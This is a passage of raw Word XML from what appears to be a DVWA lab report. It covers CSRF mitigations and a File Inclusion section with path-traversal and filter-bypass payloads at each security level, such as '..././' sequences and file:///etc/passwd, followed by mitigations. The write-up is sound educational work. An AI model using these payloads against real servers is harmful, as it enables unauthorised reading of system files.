    <w:p w14:paraId="4CDA6CF2" w14:textId="4A93858F" w:rsidR="00650A90" w:rsidRDefault="00650A90" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CDC8BB5" wp14:editId="0548A213">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2466039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76D8" w14:textId="70936B0C" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t>3—</w:t>
      </w:r>
      <w:r w:rsidR="00650A90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650A90" w:rsidRPr="00650A90">
        <w:t>Copy_js_var</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00650A90" w:rsidRPr="00650A90">
        <w:t>www</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00650A90" w:rsidRPr="00650A90">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B9AC1" w14:textId="52F0D0AB" w:rsidR="00650A90" w:rsidRDefault="00650A90" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374056FF" wp14:editId="3DDDE936">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17049662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7343" w14:textId="6C491741" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t>4—</w:t>
      </w:r>
      <w:r w:rsidR="00650A90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650A90" w:rsidRPr="00650A90">
        <w:t>Insert_Script_</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>into_</w:t>
      </w:r>
      <w:r w:rsidR="00650A90" w:rsidRPr="00650A90">
        <w:t>URL_</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>than</w:t>
      </w:r>
      <w:r w:rsidR="00650A90" w:rsidRPr="00650A90">
        <w:t>_Reload</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>_page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2121F681" w14:textId="37EE5C8B" w:rsidR="00650A90" w:rsidRPr="00A62E25" w:rsidRDefault="00650A90" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D42952" wp14:editId="5F182F5D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7517063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1710" w14:textId="2C3B1E79" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc198745904"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="12325AA6" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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309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F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. CSRF Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC4C60" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Generate and validate a </w:t>
      </w:r>
      <w:r w:rsidRPr="000F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unique, unpredictable token</w:t>
      </w:r>
      <w:r w:rsidRPr="000F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for every sensitive request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289ACFF3" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example: Include a csrf_token as a hidden field in forms and validate it on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56286548" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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309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F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. SameSite Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C26A59" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use SameSite=Strict or Lax in cookies to block cross-origin requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B76C773" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Set-Cookie: session_id=xyz; SameSite=Strict; Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE6EEE" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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309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F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Double Submit Cookies (Backup Technique)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882665E" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Send the CSRF token in both a cookie and a POST field. Compare them on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E100C" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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309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F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. User Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA656A" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ask the user to re-enter their password before sensitive actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71712A" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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309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F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F5A69" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prevents loading of unauthorized forms/scripts from attacker-controlled domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A9967" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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CD7AE" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C347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A710C5" w14:textId="111E58C6" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc198745905"/>
      <w:r>
        <w:t>File Inclusion</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6D1E78AC" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc198745906"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="3BE118F7" w14:textId="77777777" w:rsidR="00EC4E7E" w:rsidRPr="00EC4E7E" w:rsidRDefault="00EC4E7E" w:rsidP="00EC4E7E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">While testing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File Inclusion module</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in DVWA, I found that the application was vulnerable to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Local File Inclusion (LFI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and potentially </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remote File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> depending on its configuration. File Inclusion vulnerabilities occur when an attacker manipulates a file path input to load unauthorized files from the server or a remote URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45878CF4" w14:textId="77777777" w:rsidR="00EC4E7E" w:rsidRPr="00EC4E7E" w:rsidRDefault="00EC4E7E" w:rsidP="00EC4E7E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC4E7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This can lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C374294" w14:textId="77777777" w:rsidR="00EC4E7E" w:rsidRPr="00EC4E7E" w:rsidRDefault="00EC4E7E" w:rsidP="00EC4E7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7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reading sensitive system files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F023514" w14:textId="77777777" w:rsidR="00EC4E7E" w:rsidRPr="00EC4E7E" w:rsidRDefault="00EC4E7E" w:rsidP="00EC4E7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7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code execution (in case of RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB3049" w14:textId="77777777" w:rsidR="00EC4E7E" w:rsidRPr="00EC4E7E" w:rsidRDefault="00EC4E7E" w:rsidP="00EC4E7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7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gaining reverse shells (with log poisoning or wrappers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F9E16" w14:textId="77777777" w:rsidR="00EC4E7E" w:rsidRPr="00EC4E7E" w:rsidRDefault="00EC4E7E" w:rsidP="00EC4E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A1ABC" w14:textId="122F22BF" w:rsidR="00EC4E7E" w:rsidRDefault="00C3478B" w:rsidP="00EC4E7E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc198745907"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="0C8F6AED" w14:textId="27E1B0FB" w:rsidR="00EC4E7E" w:rsidRDefault="00E3654C" w:rsidP="00EC4E7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3654C">
        <w:t>LFI_etcpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476974A" w14:textId="6FC4C0A1" w:rsidR="0029543A" w:rsidRDefault="0029543A" w:rsidP="0029543A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Insert payload in the url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7711D079" w14:textId="6129DCAC" w:rsidR="00E3654C" w:rsidRDefault="0029543A" w:rsidP="00E3654C">
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidR="00E3654C" w:rsidRPr="00E3654C">
        <w:t>../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E4D800" w14:textId="0AF05138" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A124432" wp14:editId="6A6F71E5">
            <wp:extent cx="5731510" cy="2961005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="154047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1929" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="05C8AAEC" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="23B914F2" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="61950418" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="03235DC6" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="46B3A424" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="3470398F" w14:textId="6EC454C1" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00EC4E7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E3654C">
        <w:t>RFI_google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D81F957" w14:textId="087C6F82" w:rsidR="0029543A" w:rsidRDefault="0029543A" w:rsidP="0029543A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Insert payload in url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEF678" w14:textId="1C528E43" w:rsidR="00E3654C" w:rsidRDefault="0029543A" w:rsidP="00E3654C">
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidR="00E3654C" w:rsidRPr="00E3654C">
        <w:t>page=http://google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5248B73D" w14:textId="6C1B97EC" w:rsidR="00E3654C" w:rsidRPr="00EC4E7E" w:rsidRDefault="00E3654C" w:rsidP="00E3654C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53F3C76C" wp14:editId="67D17B2E">
            <wp:extent cx="5731510" cy="2961005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1794666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04D2" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc198745908"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="43CFE791" w14:textId="4080888A" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C608C74" w14:textId="70DF0074" w:rsidR="00E3654C" w:rsidRDefault="0029543A" w:rsidP="00E3654C">
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidR="00E3654C" w:rsidRPr="00E3654C">
        <w:t>..././..././..././..././..././..././..././etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606922B4" w14:textId="25784080" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6952284D" wp14:editId="2A49AF29">
            <wp:extent cx="5731510" cy="2961005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7116890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1E0C" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="025960BF" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="0C751BFA" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="4F82F4E3" w14:textId="77777777" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C"/>
    <w:p w14:paraId="6F6FAFA3" w14:textId="5A8AC377" w:rsidR="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B183CC" w14:textId="14172D2C" w:rsidR="0029543A" w:rsidRDefault="0029543A" w:rsidP="0029543A">
      <w:r>
        <w:t>Use this payload to bypass the security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA712D" w14:textId="10178D92" w:rsidR="00E3654C" w:rsidRDefault="0029543A" w:rsidP="00E3654C">
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidR="00E3654C" w:rsidRPr="00E3654C">
        <w:t>hthttp://tp://google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF6A0C" w14:textId="18474608" w:rsidR="00E3654C" w:rsidRPr="00E3654C" w:rsidRDefault="00E3654C" w:rsidP="00E3654C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19BC5548" wp14:editId="4CFD3E3E">
            <wp:extent cx="5731510" cy="2963545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="2140156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CDD8" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc198745909"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0C38FAA7" w14:textId="00F4834E" w:rsidR="0029543A" w:rsidRDefault="00E3654C" w:rsidP="00E3654C">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EF109E">
        <w:t xml:space="preserve"> LFI 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB78EB7" w14:textId="74E22F87" w:rsidR="00EF109E" w:rsidRDefault="0029543A" w:rsidP="00E3654C">
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidR="00EF109E" w:rsidRPr="00EF109E">
        <w:t>page=file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85C3E7" w14:textId="10002819" w:rsidR="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00E3654C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="420BC873" wp14:editId="1945A131">
            <wp:extent cx="5731510" cy="2956560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1203462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1927" w14:textId="77777777" w:rsidR="0029543A" w:rsidRDefault="0029543A" w:rsidP="00EF109E"/>
    <w:p w14:paraId="3F5E7BDC" w14:textId="77777777" w:rsidR="0029543A" w:rsidRDefault="00EF109E" w:rsidP="00EF109E">
      <w:r>
        <w:t>LFI 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D07798D" w14:textId="5B6D4723" w:rsidR="00EF109E" w:rsidRDefault="0029543A" w:rsidP="00EF109E">
      <w:r>
        <w:t xml:space="preserve">Payload= </w:t>
      </w:r>
      <w:r w:rsidR="00EF109E" w:rsidRPr="00EF109E">
        <w:t>page=file.php%0A/../../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A987D0B" w14:textId="085EA8E1" w:rsidR="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E0FA698" wp14:editId="5D9431C1">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1698240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A5B0" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00E3654C" w:rsidRDefault="00EF109E" w:rsidP="00EF109E"/>
    <w:p w14:paraId="13D1C47E" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRPr="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc198745910"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="019E65F3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Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9C11E" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109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Strictly validate and whitelist file names (do not allow user-controlled file paths)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55326B53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Disable URL Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E044A7" w14:textId="28C2DB48" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109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In php.ini:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215D4C8" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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allow_url_include = Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A90B83A" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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allow_url_fopen = Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF84C0E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Use Static Includes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A9DC3" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109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Avoid dynamic include($_GET['page']); instead use switch-cases or constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3122A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Log Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386CA44F" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109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Watch for access to unusual paths like ../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE83661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Web Server Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797AEC3E" w14:textId="77777777" w:rsidR="00EF109E" w:rsidRPr="00EF109E" w:rsidRDefault="00EF109E" w:rsidP="00EF109E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Run web server with limited privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56614846" w14:textId="0938C775" w:rsidR="00C3478B" w:rsidRPr="00EF109E" w:rsidRDefault="00C3478B" w:rsidP="00EF10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89C55" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4C00F" w14:textId="1F8A904B" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
